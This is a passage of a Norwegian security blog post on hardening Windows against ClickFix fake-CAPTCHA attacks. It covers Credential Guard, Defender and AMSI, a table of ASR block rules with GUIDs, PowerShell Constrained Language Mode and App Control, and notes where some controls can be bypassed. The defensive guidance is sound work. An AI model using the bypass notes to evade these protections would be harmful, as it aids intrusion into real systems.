secure desktop-enforcement, prompt-atferd for admins og standardbrukere samt installer-deteksjon.",[836,901,902,905],{},[839,903,904],{},"Credential Guard:"," isoler NTLM-hasher, Kerberos-billetter og annet credential-materiale med virtualiseringsbasert sikkerhet, slik at credential-tyveri forblir vanskelig selv om en angriper får adminrettigheter.",[526,907,908],{},"Disse kontrollene reduserer eskaleringsmulighetene, beskytter credentials og håndhever Least Privilege. Grensen her: de begrenser hva som skjer etter en kompromittering. De hindrer ikke en infostealer i standardbrukerkonteksten i å lese ut cookies, session-tokens og app-credential-stores som er lesbare for brukeren.",[526,910,911],{},"Så Microsoft Defender. Defender AV kan oppdage payloaden i det andre trinnet, men bare med riktige innstillinger: slå på Cloud Protection og sett beskyttelsesnivået til High eller High+. AMSI, Antimalware Scan Interface, lar applikasjoner overlevere innhold til Defender for kontroll under kjøring, etter at det er dekryptert eller deobfuskert i minnet, men før det kjøres. PowerShell bruker AMSI til å identifisere skadekode, og AMSI trenger sanntidsbeskyttelse og Behavior Monitoring.",[526,913,914],{},"Minst fem Attack Surface Reduction-regler er relevante mot ClickFix:",[597,916,918],{"style":917},"margin: 0.5rem 0 2rem; overflow-x: auto",[919,920,834,922,834,941],"table",{"style":921},"width:100%; border-collapse: collapse; font-size: 0.85rem",[923,924,925,926,834],"thead",{},"\n    ",[927,928,929,930,929,935,929,938,925],"tr",{},"\n      ",[931,932,934],"th",{"style":933},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Regel",[931,936,937],{"style":933},"GUID",[931,939,940],{"style":933},"ClickFix-relevans",[942,943,925,944,925,960,925,975,925,988,925,1001,834],"tbody",{},[927,945,929,946,929,951,929,957,925],{},[947,948,950],"td",{"style":949},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Blokker kjøring av potensielt tilslørte skript",[947,952,954],{"style":953},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[580,955,956],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[947,958,959],{"style":949},"Tilslørte eller kodede skript i kjørings- og evasion-fasen",[927,961,929,962,929,966,929,972,925],{},[947,963,965],{"style":964},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Hindre JavaScript eller VBScript i å starte nedlastet kjørbart innhold",[947,967,969],{"style":968},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[580,970,971],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[947,973,974],{"style":964},"WSH, .js eller .vbs som starter nedlastede payloads",[927,976,929,977,929,980,929,985,925],{},[947,978,979],{"style":949},"Tillat kjørbare filer kun ved prevalens-, alders- eller trusted list-kriterium",[947,981,982],{"style":953},[580,983,984],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[947,986,987],{"style":949},"Ferske eller sjeldne droppede kjørbare filer",[927,989,929,990,929,993,929,998,925],{},[947,991,992],{"style":964},"Blokker kjørbart innhold fra e-postklient og webmail",[947,994,995],{"style":968},[580,996,997],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[947,999,1000],{"style":964},"ClickFix-varianter levert per e-post",[927,1002,929,1003,929,1006,929,1011,925],{},[947,1004,1005],{"style":949},"Hindre alle Office-applikasjoner i å opprette underprosesser",[947,1007,1008],{"style":953},[580,1009,1010],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[947,1012,1013],{"style":949},"Office-agn-varianter som starter interpretere",[526,1015,1016],{},"Rull ut ASR først i audit-modus, så som pilot, så i block-modus. Tamper Protection er den siste linjen: den hindrer angriperen i å slå av deteksjonene deres.",[526,1018,1019],{},"Ved PowerShell selv reduserer dere risikoen fra legacy-interpretere. Identifiser og fjern, der det er gjennomførbart, Windows PowerShell 2.0 og legacy-VBScript-komponenter som mangler logg- og security-funksjonene i nyere versjoner. Neste steg er Constrained Language Mode (CLM), som begrenser de tilgjengelige språkelementene i PowerShell og blokkerer mange skriptbaserte teknikker. CLM har bare robust sikkerhetsverdi når en system application control-policy håndhever den (App Control for Business); variantene via miljøvariabel og AppLocker er svakere og lar seg omgå. Og mange systemer trenger Full Language Mode for å fungere, for eksempel software deployment-tooling, og derfor er CLM ofte bare gjennomførbart i utvalgte miljøer.",[526,1021,1022],{},"Dermed er vi ved App Control for Business (tidligere WDAC). App Control håndhever en kodeintegritetspolicy for hvilke kjørbare filer, skript og drivere som får kjøre. Den strategiske holdningen er default-deny pluss Microsofts anbefalte Block Rules, den kjente LOLBin- og bypass-blokklisten. App Control er også den korrekte håndhevingsveien for PowerShell-CLM. Script Enforcement blokkerer MSHTA- og MSXML-skripthoster, tvinger PowerShell inn i CLM og blokkerer ikke tillatt bruk av Windows Script Host. Noen atferdsfakta er viktige:",[831,1024,834,1025,834,1028,834,1031],{"style":833},[836,1026,1027],{},"Base policies som stoler på Windows, blokkerer ikke betrodde LOLBins automatisk. Dere må merge inn Microsofts anbefalte Block Rules for å lukke de kjente bypassene.",[836,1029,1030],{},"App Control hindrer ikke signert powershell.exe eller cmd.exe i å starte. Den begrenser hva de får gjøre (CLM, ingen usignert eller ikke tillatt payload) og regulerer ikke innholdet i cmd.exe, .bat eller .cmd. Derfor legges den i lag med ASR og launch-herding, ikke brukes alene.",[836,1032,1033],{},"Audit-modus er ikke nøytral: Script Enforcement blokkerer også i audit kjøringen av MSHTA og MSXML og kan endre PowerShell-CLM-atferden. Derfor må App Control i audit være pilot- eller ring-begrenset fra første utrulling, aldri på tvers av hele flåten.",[526,1035,1036],{},"App Control er den enkeltkontrollen med høyest confidence mot interpreter-, LOLBin- og payload-kjøringsfasene, og den håndhever robust CLM. Samtidig bærer den den høyeste deployment-kompleksiteten og den høyeste rollback-risikoen, for en feilkonfigurasjon blokkerer kjøringen. Innfør den via kontrollerte pilotringer.",[559,1038,1040],{"id":1039},"hvor-vi-kommer-inn-i-bildet","Hvor vi kommer inn i bildet",[526,1042,565],{},[526,1044,1045,1046,1050],{},"ClickFix er raskt, og Microsofts native deteksjoner dekker det meste, men ikke alt. For CSOC-kundene våre utvider vi dekningen løpende der det dukker opp hull: kjøring via Windows Terminal, RAT-drevne support-svindler og post-compromise-atferd. Vil dere vite hvor miljøet deres står, ",[1047,1048,1049],"a",{"href":276},"ta kontakt",".",[1052,1053,1054],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1056},[1057,1058,1059,1060,1061,1062,1063,1064,1065],{"id":561,"depth":531,"text":562},{"id":643,"depth":531,"text":644},{"id":655,"depth":531,"text":656},{"id":678,"depth":531,"text":679},{"id":790,"depth":531,"text":791},{"id":820,"depth":531,"text":821},{"id":857,"depth":531,"text":858},{"id":873,"depth":531,"text":874},{"id":1039,"depth":531,"text":1040},"post",{"lang":1068,"seoTitle":1069,"titleClass":1070,"date":1071,"categories":1072,"blogtitlepic":1073,"socialimg":1074,"customExcerpt":1075,"keywords":1076,"asideNav":1077,"published":325},"no","Oppdage og hindre ClickFix-angrep: Win+R-lim-inn-trikset","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix gjør brukere til sin egen angriper: en forfalsket CAPTCHA, en kopier-lim-inn, og skadekode kjører i minnet uten at noe havner på disken. Hvordan Microsoft Defender oppdager angrepet, hvor deteksjonen kommer til kort, og hvordan dere lukker hullet med et RunMRU-hunt og fire beskyttelseslag.","ClickFix, ClickFix-angrep, ClickFix-deteksjon, hindre ClickFix, fake CAPTCHA, Win+R-angrep, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-regler, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, infostealer, LOLBin, PowerShell-herding",{"menuItems":1078},[1079,1082,1085,1088,1091,1094,1097,1100,1103],{"href":1080,"text":1081},"#clickfix-angrepskjeden","Angrepskjeden",{"href":1083,"text":1084},"#hva-microsoft-defender-oppdager","Hva Defender oppdager",{"href":1086,"text":1087},"#hvor-den-native-deteksjonen-kommer-til-kort","Hvor det skurrer",{"href":1089,"text":1090},"#å-lukke-hullet-et-runmru-hunt","Lukke hullet",{"href":1092,"text":1093},"#beskyttelseslag-1-blokkere-leveransen","Lag 1: Leveranse",{"href":1095,"text":1096},"#beskyttelseslag-2-blokkere-trikset","Lag 2: Trikset",{"href":1098,"text":1099},"#beskyttelseslag-3-blokkere-handlingen","Lag 3: Handlingen",{"href":1101,"text":1102},"#beskyttelseslag-4-blokkere-kjøringen","Lag 4: Kjøring",{"href":1104,"text":1040},"#hvor-vi-kommer-inn-i-bildet","/posts/2026-09-21-clickfix-prevent-detect",{"title":553,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1109,1110,1111],"Defender","SOC","Endpoint Security","VSAhXi3oqOCfZbtS3GVYelCDHe93_OtmgLetB-9_JlQ",[],{"id":1115,"extension":1116,"meta":1117,"stem":8,"__hash__":1127},"authors_data/authors.json","json",{"Fritz Zurhorst":1118,"Nadine Klein":1123},{"display_name":555,"avatar":1119,"permalink":1120,"linkedin":1121,"imageOffsetTop":1122},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":535,"avatar":1124,"permalink":1125,"twitter":1126,"linkedin":548,"imageOffsetTop":1122},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383984654]